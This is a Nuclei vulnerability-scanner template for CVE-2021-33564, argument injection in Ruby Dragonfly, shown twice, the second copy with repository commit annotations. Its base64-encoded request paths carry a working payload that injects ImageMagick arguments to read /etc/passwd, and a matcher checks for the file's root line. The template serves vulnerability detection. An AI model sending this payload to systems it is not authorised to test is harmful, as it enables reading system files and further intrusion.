nuclei-templates/cves/2021/CVE-2021-33564.yaml

id: CVE-2021-33564

info:
  name: Argument Injection in Ruby Dragonfly
  author: 0xsapra
  severity: critical
  reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
  tags: cve,cve2021,rce,ruby

requests:
  - method: GET
    path:
      - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
      - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
CVE-2021-33564.yaml 2021-05-28 21:03:38 +00:00			`id: CVE-2021-33564`

			`info:`
			`name: Argument Injection in Ruby Dragonfly`
			`author: 0xsapra`
			`severity: critical`
			`reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/`
			`tags: cve,cve2021,rce,ruby`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="`
			`- "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`